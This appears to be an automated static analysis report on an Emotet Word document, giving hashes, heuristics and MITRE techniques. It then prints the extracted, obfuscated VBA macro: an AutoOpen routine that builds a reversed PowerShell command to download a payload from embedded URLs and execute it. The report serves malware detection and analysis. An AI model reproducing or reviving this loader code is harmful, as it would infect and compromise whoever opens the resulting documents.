Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 e80c62b1bc6baa07…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 75.2 KB
Created: 2018-09-03 20:29:00
Authoring application: Microsoft Office Word
First seen: 2019-03-18
MD5: 2f0ae7b184da87027fcdc29d4f7d6d76
SHA-1: ac0872e9e31bdef23a47cb4a2f53e3b831c2d8e6
SHA-256: e80c62b1bc6baa07d65f49a9be93e62ed88cd19a4e06c406fc8d40cc6a427406
Risk Score: 202

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1566.001 Phishing: Spearphishing Attachment

The sample is a malicious Office document containing VBA macros, specifically an AutoOpen macro that calls the Shell() function. This combination indicates an attempt to download and execute a secondary payload as soon as the document is opened. The ClamAV detection name 'Doc.Downloader.Emotet-6884103-0' strongly suggests the Emotet family. The VBA script's use of Shell() from an AutoOpen macro is the key indicator of this downloader behavior.

Heuristics (6)

  • ClamAV: Doc.Downloader.Emotet-6884103-0 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6884103-0
  • VBA macros detected (severity: medium, 2 related findings, rule: OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA (severity: critical, rule: OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro (severity: high, rule: OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker (severity: medium, rule: OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (severity: info, rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

  • Filename: macros.bas
    Kind: vba-macro
    Source: oletools.olevba.extract_macros (decoded VBA source)
    Size: 4869 bytes
    SHA-256: c2face349f4f324954309a8b4c3cbb870d69d49d5727db213b8a1b55175310ef

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "pnzbBkAEkvILAI"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On _
Error _
Resume _
Next
   Hour "nrhInichYGw" + "GULslcwDhnfk"
   Hour "179806134" + "3042" + "cz" + "499249810"
VBA.Shell KeyString(6 + 5 + 4 + 8 + 44) + tRjwcmXw + PYcIqGzmztDQ + XEqCAUEknpl + IuKjcwj + zwRGzLwvAXjQ + UEjYwIWE, 57 - 57
   Hour "rhjwOtEcw" + "5784"
   Hour "SG" + "uHqj" + "cwUCj" + "VR"
   Hour "7586" + "dVRwBnTYFZZOsS" + "KiSMMvcW" + "Sfw"
End Sub
Attribute VB_Name = "fViaJjkDBwDdV"
Function XEqCAUEknpl()

On _
Error _
Resume _
Next
Hour "144618918" + "60127637" + "74493391" + "94834062"
   Hour "EoJ" + "F"
   Hour "Vn" + "LvYZ"
   Hour "AjacQAW" + "lYfX" + "dN" + "P"
OiWhIPJLV = "md" + " /V^:^" + "O" + "N" + "/C" + Chr(2 + 5 + 3 + 2 + 22) + "^s^" + "et V" + "^x= ^  " + "^ ^    " + "^  " + " ^  ^"
Hour "KEFNJUjnWN" + "rsHfCFnJ" + "387373281" + "1544"
   Hour "jq" + "Vcz" + "5949" + "O"
   Hour "OB" + "144517342"
   Hour "RwUsU" + "OSOwRuaz" + "Jw" + "fn"
IBdjcd = "  ^ ^" + " " + "}}^{^h" + "c^t" + "ac};k" + "^aer^b"
Hour "iKMdK" + "zOPA" + "hj" + "rzzd"
   Hour "RfRswbpauPEX" + "6674"
mzFRzoGtWfI = ";NET$^" + " m^e" + "^t^I" + "-e" + "k" + "ovn^I" + ";)NE^T$" + "^ ,^" + "f" + "^U^" + "X"
Hour "vAjKkn" + "397685715"
jDDNjNtVw = "$(eliF" + "d^aol" + "nw^o^D^" + ".ii^U${" + "yr^t^{)"
Hour "j" + "mbY" + "icTBjBa" + "Onw"
   Hour "UwzwwTTmEJhbT" + "205842874"
   Hour "147443864" + "YKYJKHof" + "439119945" + "iICtUfjJZU"
   Hour "qaJOLU" + "wZz" + "108882266" + "7110"
   Hour "174505011" + "466709728"
jKIIOtiiclQ = "^LwV" + "^" + "$" + "^" + " n^i" + " ^f" + "U^X^" + "$(hcaer" + "o^f;'" + "exe" + ".'^+^w" + "Dv$^+'" + "\'"
Hour "YFEd" + "uCTk" + "317004979" + "dljMvDG"
   Hour "s" + "1226" + "dJhYWGlWj" + "QSsMqVjio"
   Hour "6534" + "WBbGM" + "IcwjfIuz" + "G"
DSzazDnT = "+c" + "^ilbu" + "^p" + "^:vn^" + "e$^" + "=N" + "E^T$^"
Hour "1059" + "KOcth"
   Hour "JwOlPIL" + "965"
QHjDRBLF = ";" + "'3^1" + "^" + "3'^ " + "^= wDv^" + "$^;)" + "'^@'(^t" + "^il" + "^pS" + "^" + ".^'" + "^LrR" + "^f5^p"
Hour "380650044" + "5799" + "wEfNY" + "399199336"
   Hour "6033" + "qr" + "AJMKcKwHJ" + "VVzN"
   Hour "ti" + "EtHZzM"
   Hour "6098" + "297176320"
kNRPWmFumnD = "q^j^T" + "^o/mo" + "c.^tne" + "^l" + "^at^l"
Hour "2568" + "k"
   Hour "vCYRbvqwOzIwdY" + "pRQzABsV"
   Hour "405137494" + "HDtUL"
   Hour "235317130" + "q" + "5713" + "uJSD"
   Hour "nvtQmDDDp" + "VfhO" + "oS" + "GDjTuNabuCh"
   Hour "184539444" + "HXoO" + "zFON" + "bYLXlbljcWILdY"
WVwIIPMf = "^la" + "^s^a" + "^h//:^p" + "tth^@" + "^s^h"
Hour "iTm" + "rk"
   Hour "JUi" + "395432632" + "PUBjpL" + "AV"
   Hour "fit" + "ZTJIHT" + "326081667" + "npMj"
   Hour "UnzVuRTm" + "5755"
CiLjFKGVHi = "x^1^a" + "U^s^tR^" + "t" + "/t^" + "en^.sr" + "otc^ar" + "^tnoc-" + "^e" + "^g^" + "atire" + "h//"
Hour "BARUR" + "62814639"
   Hour "7680" + "3969"
jAOCqmNBW = ":p^tth" + "^" + "@t^Pu^8" + "I^k^E" + "/" + "zk.^1ik" + "ira" + "h" + "s^.^" + "z^ak/" + "/"
Hour "7405" + "j" + "A" + "2620"
   Hour "wwWA" + "184339221"
   Hour "FzSn" + "PZM" + "4986" + "aN"
   Hour "zjhrz" + "4331"
OzupjEiUd = ":p^" + "t" + "^th^" + "@fHw3" + "^G^KVH" + "D^u/moc" + "." + "s" + "e^la^"
XEqCAUEknpl = OiWhIPJLV + IBdjcd + mzFRzoGtWfI + jDDNjNtVw + jKIIOtiiclQ + DSzazDnT + QHjDRBLF + kNRPWmFumnD + WVwIIPMf + CiLjFKGVHi + jAOCqmNBW + OzupjEiUd
   Hour "L" + "abCEuNjJ" + "pKVz" + "6970"
   Hour "420390399" + "254672433"
   Hour "503597402" + "9519"
End Function
Function IuKjcwj()

On _
Error _
Resume _
Next
Hour "D" + "wchLEEBD" + "3905" + "J"
   Hour "2122" + "KUb" + "FTACFDwa" + "5117"
   Hour "BlwKYSSkJTkit" + "517546786"
ObIAKo = "sotu^" + "a^si" + "va^dlu^" + "a^p" + "//^:^" + "p^tth^@" + "M^" + "E^" + "Etns^" + "XAp/^" + "k^s^.c^" + "iv^o^so"
Hour "cBP" + "2485"
jBQErMMjX = "^tr^ab" + "//:" + "p^tt^h^" + 
... (truncated)